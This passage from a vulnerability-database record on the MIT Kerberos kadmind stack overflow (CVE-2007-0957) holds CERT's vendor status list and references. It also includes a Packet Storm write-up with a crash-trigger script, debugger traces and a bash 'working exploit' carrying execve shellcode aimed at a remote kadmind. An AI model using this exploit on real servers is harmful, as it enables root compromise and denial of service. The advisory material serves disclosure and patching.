vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### Red Hat, Inc. __ Affected\n\nUpdated: April 02, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [RHSA-2007-0095](<https://rhn.redhat.com/errata/RHSA-2007-0095.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### SUSE Linux __ Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [SUSE-SA:2007:025](<http://lists.suse.com/archive/suse-security-announce/2007-Apr/0001.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### Trustix Secure Linux __ Affected\n\nNotified: April 04, 2007 Updated: April 06, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Trustix Secure Linux Security Advisory [#2007-0012](<http://www.trustix.org/errata/2007/0012/>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### rPath __ Affected\n\nUpdated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [rPSA-2007-0063-1](<http://lists.rpath.com/pipermail/security-announce/2007-April/000167.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### Cisco Systems, Inc. Not Affected\n\nUpdated: April 02, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Not Affected\n\nUpdated: April 02, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation __ Not Affected\n\nUpdated: April 04, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nKerberos is available for the AIX Operating System via Network Authentication Services for AIX. Network Authentication Services for AIX is not affected by the issues addressed in MITKRB5-SA-2007-002 [CVE-2007-0957, CERT/CC VU#704024].\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Not Affected\n\nNotified: April 04, 2007 Updated: April 06, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux is not vulnerable. We don't provide Kerberos.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Symantec, Inc. Not Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 3com, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### AT&T Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Alcatel Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avici Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Borderware Technologies Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Charlotte's Web Networks Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Chiaro Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Clavister Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Computer Associates Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Data Connection, Ltd. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC, Inc. (formerly Data General Corporation) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ericsson Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fortinet, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Foundry Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Global Technology Associates Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hyperchip Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IP Filter Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Intel Corporation Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Internet Security Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### KTH Kerberos Team Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Linksys (A division of Cisco Systems) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Lucent Technologies Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Luminous Networks Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multinet (owned Process Software Corporation) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multitech, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Network Appliance, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NextHop Technologies, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nortel Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Redback Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Riverstone Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secure Computing Network Security Division Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secureworx, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Stonesoft Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### eSoft, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### netfilter Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 80 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt>\n * <http://web.mit.edu/kerberos/advisories/2007-002-patch.txt>\n * <http://web.mit.edu/kerberos/advisories/2007-002-patch.txt.asc>\n * <http://secunia.com/advisories/24757/>\n * <http://secunia.com/advisories/24735/>\n * <http://secunia.com/advisories/24750/>\n * <http://secunia.com/advisories/24740/>\n * <https://secure-support.novell.com/KanisaPlatform/Publishing/150/3618705_f.SAL_Public.html>\n * <http://securitytracker.com/alerts/2007/Apr/1017849.html>\n * <http://docs.info.apple.com/article.html?artnum=305391>\n * <http://secunia.com/advisories/24966/>\n * <http://secunia.com/advisories/25464/>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102930-1>\n\n### Acknowledgements\n\nThis issue was reported in MIT krb5 Security Advisory MITKRB5-SA-2007-002. The MIT Kerberos Development Team credits iDefense Labs for reporting this issue.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0957](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-0957>) \n---|--- \n**Severity Metric:** | 16.96 \n**Date Public:** | 2007-04-03 \n**Date First Published:** | 2007-04-03 \n**Date Last Updated: ** | 2007-05-30 17:35 UTC \n**Document Revision: ** | 56 \n", "modified": "2007-05-30T17:35:00", "published": "2007-04-03T00:00:00", "id": "VU:704024", "href": "https://www.kb.cert.org/vuls/id/704024", "type": "cert", "title": "MIT Kerberos 5 administration daemon stack overflow in krb5_klog_syslog()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:24", "description": "", "published": "2007-04-11T00:00:00", "type": "packetstorm", "title": "kadmind-overflow.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0957"], "modified": "2007-04-11T00:00:00", "id": "PACKETSTORM:55828", "href": "https://packetstormsecurity.com/files/55828/kadmind-overflow.txt.html", "sourceData": "`Kerberos Version 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability \n \n \nThe Issue: \nRemotely exploitable buffer overflow vulnerability in Kerberos kadmind service \n \nThe Versions: \nkrb5-1.5.1 (Latest version from http://eb.mit.edu/Kerberos/ ) \nkrb5-server-1.4.3-5.1 (Latest version from Fedora yum update) \n \nThe Environment: \nLinux Fedora Core 5 x86_64 bit \n \nThe Overview: \n \nThere is a remotly exploitable overflow bug in Kerberos kadmind service that can be triggered during the administration \nof principals via kadmin or kadmin.local and either in a local context or a remote context, which will allow the attacker \nthe possibility of having Kerberos server yield the permissions of the user that it is running a, usually root. It can \nalso be used as a denail of service against kadmind. \n \nroot 1834 1 0 22:29 ? 00:00:00 /usr/kerberos/sbin/krb5kdc \nroot 6600 1 0 23:00 ? 00:00:00 /usr/kerberos/sbin/kadmind \n \nTo trigger the exploit, a valid user account has to first of all authenticate to the Kerberos service and have a ticket \ngenerated, the user therefor must be or have access to an admin account that can access thre remote kadmind \nservice, which limits the scope of the attack slightly. However, this still allows anyone with the most limited access \nto the service to kill it or gain root access and as such should be treated as critical. \n \nA trivial issue encountered was that the kadmin client would filter out crazy strings passed to it, so you can't use it \nby default to send in shellcode and return addresses. To get around that we modify the client source code a bit to \nhonour our malicious values and then upload it to our user directory, and as if by magic it will no longer bail when it \nencounters these strings ;) \n \n \nFollowing is the vulnerable function with the unused code, ifdefs and comments removed to make it easier to read \n \n/* krb5-1.5.1/src/lib/kadm5/logger.c \n \nstatic int \nklog_vsyslog(int priority, const char *format, va_list arglist) \n{ \nchar outbuf[KRB5_KLOG_MAX_ERRMSG_SIZE]; \nchar *syslogp; \n \nstrncpy(outbuf, ctime(&now) + 4, 15); \ncp += 15; \n \nsyslogp = &outbuf[strlen(outbuf)]; \n \nvsprintf(syslogp, format, arglist); \n \n*/ \n \n \nBy exersizing any of the option presented to us in kadmin, we should be able to trigger this little bug, including: \n \nadd_principal \ndelete_principal \nmodify_principal \nchange_password \nget_principal \n... and on..... \n \nAnother nice feature to kadmin is that it is possible to run it from the command line, and as such this makes crafting \na payload much easier :) by running the following script, it should be possible to trigger this bug and kill kadmind: \n \n########## \n \n#!/bin/bash \nADDIT=\"get_principal\" \nATTACK=\"cr4yz33_h4xx0r\" \nKADMIN=\"/usr/kerberos/sbin/kadmin\" \nKADMINDP=\"`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print $4}'| sed -e s/0.0.0.0://`\" \nPRINCIPAL=\"root/admin@OPEN-SECURITY.ORG\" \nTARGET=coredump.open-security.org \nTRIGGAH=\"`perl -e 'print \"A\" x 5000'`\" \n \n$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q \"$ADDIT -pw $ATTACK $TRIGGAH\" \n \n########## \n \n \nAfter running this script with various sized buffer values, we get faults in the following locations: \n \n// With 2000 A's // \n#0 0x0000003a2ed427d5 in vfprintf () from /lib64/libc.so.6 \n#1 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6 \n#2 0x00002aaaaaabb2ea in klog_vsyslog (priority=5, \nformat=0x40c4e0 \"Request: %s, %s, %s, client=%s, service=%s, addr=%s\", arglist=0x7ffffdb40e60) \nat logger.c:854 \n#3 0x4141414141414141 in ?? () \n#4 0x4141414141414141 in ?? () \n#5 0x4141414141414141 in ?? () \n.... \n \n \n// With 5000 A's (On the Fedora version) // \n#0 0x00002aaaab65fc90 in strlen () from /lib64/libc.so.6 \n#1 0x00002aaaab63088b in vfprintf () from /lib64/libc.so.6 \n#2 0x00002aaaab6ca8ad in __vsprintf_chk () from /lib64/libc.so.6 \n#3 0x00002aaaaabd2283 in krb5_klog_syslog () from /usr/lib64/libkadm5srv.so.5 \n#4 0x4141414141414141 in ?? () \n#5 0x4141414141414141 in ?? () \n.... \n \n \n// With 30000 a's // \n#0 0x0000003a2ed750ae in mempcpy () from /lib64/libc.so.6 \n#1 0x0000003a2ed69a5b in _IO_default_xsputn_internal () from /lib64/libc.so.6 \n#2 0x0000003a2ed44294 in vfprintf () from /lib64/libc.so.6 \n#3 0x0000003a2ed5fc79 in vsprintf () from /lib64/libc.so.6 \n#4 0x00002aaaaaabb2ea in klog_vsyslog (priority=5, \nformat=0x40c4e0 \"Request: %s, %s, %s, client=%s, service=%s, addr=%s\", arglist=0x7fffbe94f220) \nat logger.c:854 \n#5 0x6161616161616161 in ?? () \n.... \n \n \n \nIn our vulnerable code we have the function klog_vsyslog, which is a lame attempt to create a custom logger, as we can \nsee by the result of this advisory. \n \n \nHere is the working exploit: \n \n#!/bin/bash \nADDIT=\"get_principal\" \nATTACK=\"cr4yz33_h4xx0r\" \nKADMIN=\"kadmin\" \nKADMINDP=\"`netstat -anp --ip | grep kadmin | grep LISTEN | awk '{print \n$4}'| sed -e s/0.0.0.0://`\" \nPRINCIPAL=\"root/admin@OPEN-SECURITY.ORG\" \nTARGET=debauch.open-security.org \nTRIGGAH=\"`perl -e 'print \"A\" x 900'`PAD`perl -e 'printf \"\\xc0\\xfa\\xff\\xbf\\x88\\xf8\\xff\\xbf\" x 20'``perl -e 'print \n\"C\" x 6'``perl -e 'print \"\\x90\" x 50'` \n`echo -e \"\\xb0\\x0b\\x99\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\x89\\xe1\\xcd\\x80\"`\" \n \n$KADMIN -s $TARGET:$KADMINDP -p $PRINCIPAL -q \"$ADDIT $TRIGGAH\" \n \n###end \n \nReference: \nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=500 \n \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/55828/kadmind-overflow.txt"}], "nessus": [{"lastseen": "2021-01-17T14:01:22", "description": "SunOS 5.8: kpasswd, libgss.so.1 and libkad.\nDate this patch was last updated by Sun : Aug/03/07", "edition": 21, "published": "2005-04-17T00:00:00", "title": "Solaris 8 (sparc) : 109223-10", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "modified": "2005-04-17T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_109223.NASL", "href": "https://www.tenable.com/plugins/nessus/18068", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18068);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", 